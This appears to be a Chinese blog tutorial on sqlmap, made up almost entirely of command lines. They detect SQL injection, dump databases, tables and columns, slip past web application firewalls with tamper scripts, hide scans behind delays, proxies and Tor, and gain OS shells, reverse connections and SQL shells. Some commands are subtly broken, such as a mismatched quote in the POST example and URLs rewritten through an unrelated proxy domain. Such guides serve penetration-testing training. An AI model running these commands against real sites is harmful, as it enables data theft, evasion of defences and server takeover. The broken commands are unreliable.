目录
简介
SQLMap是一款自动化 SQL 注入工具,能够检测和利用 SQL 注入漏洞。以下是全面的使用指南,包含基础命令、高级技巧和实战案例。
一、安装与基础配置
1. 安装方法
Kali Linux:
sudo apt update && sudo apt install sqlmap
其他Linux系统:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git cd sqlmap
Windows:
2. 基本语法
sqlmap.py -h
二、基础扫描技术
1. 简单检测
sqlmap.py -u "http://example.com/page.php?id=1"
2. 指定参数扫描
sqlmap.py -u "http://example.com/page.php?id=1" -p "id"
3. 批量扫描
sqlmap.py -m urls.txt # urls.txt中包含多个目标URL
三、信息收集
1. 获取数据库信息
sqlmap.py -u "http://example.com/page.php?id=1" --dbs
2. 获取当前数据库
sqlmap.py -u "http://example.com/page.php?id=1" --current-db
3. 获取数据库用户
sqlmap.py -u "http://example.com/page.php?id=1" --current-user
4. 获取数据库版本
sqlmap.py -u "http://example.com/page.php?id=1" --banner
四、数据提取技术
1. 列出所有表
sqlmap.py -u "http://example.com/page.php?id=1" -D database_name --tables
2. 提取表数据
sqlmap.py -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
3. 提取特定列
sqlmap.py -u "http://example.com/page.php?id=1" -D database_name -T table_name -C "column1,column2" --dump
五、高级注入技术
1. 指定注入技术
sqlmap.py -u "http://example.com/page.php?id=1" --technique=B # 布尔盲注 sqlmap.py -u "http://example.com/page.php?id=1" --technique=T # 时间盲注 sqlmap.py -u "http://example.com/page.php?id=1" --technique=E # 报错注入
2. 多线程扫描
sqlmap.py -u "http://example.com/page.php?id=1" --threads=5
3. 绕过WAF
sqlmap.py -u "http://example.com/page.php?id=1" --tamper="space2comment"
常用tamper脚本:
-
space2comment:空格替换为注释 -
between:用BETWEEN替换大于号 -
randomcase:随机大小写 -
charunicodeencode:字符编码转换
六、实战案例演示
案例1:DVWA Low级别注入
sqlmap.py -u "http://192.168.21.4/DVWA/vulnerabilities/sqli/?id=1" --batch --dbs
案例2:POST请求注入
sqlmap.py -u "http://192.168.21.4/DVWA/vulnerabilities/sqli/?id=1 --data="id=1&Submit=Submit" --method POST
案例3:从文件读取请求
sqlmap.py -r request.txt # request.txt保存了Burp拦截的请求
七、防御规避技巧
1. 延迟设置
sqlmap.py -u "http://example.com/page.php?id=1" --delay=2 # 2秒延迟
2. 随机代理
sqlmap.py -u "http://example.com/page.php?id=1" --proxy="http://proxy:port"
3. 使用Tor网络
sqlmap.py -u "http://example.com/page.php?id=1" --tor --tor-type=SOCKS5
八、输出与报告
1. 保存结果到文件
sqlmap.py -u "http://example.com/page.php?id=1" --output-dir=/path/to/results
2. 生成HTML报告
sqlmap.py -u "http://example.com/page.php?id=1" --dump --output-dir=report --format=HTML
九、风险控制
1. 安全扫描模式
sqlmap.py -u "http://example.com/page.php?id=1" --risk=1 # 低风险
2. 测试级别
sqlmap.py -u "http://example.com/page.php?id=1" --level=3 # 1-5,默认1
十、实用小技巧
-
获取操作系统shell:
sqlmap.py -u "http://example.com/page.php?id=1" --os-shell
-
获取反向连接:
sqlmap.py -u "http://example.com/page.php?id=1" --os-pwn
-
暴力破解表名:
sqlmap.py -u "http://example.com/page.php?id=1" --common-tables
4.获取sql shell:
sqlmap.py -u "http://example.com/page.php?id=1" --sql-shell
扫一扫
1129
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
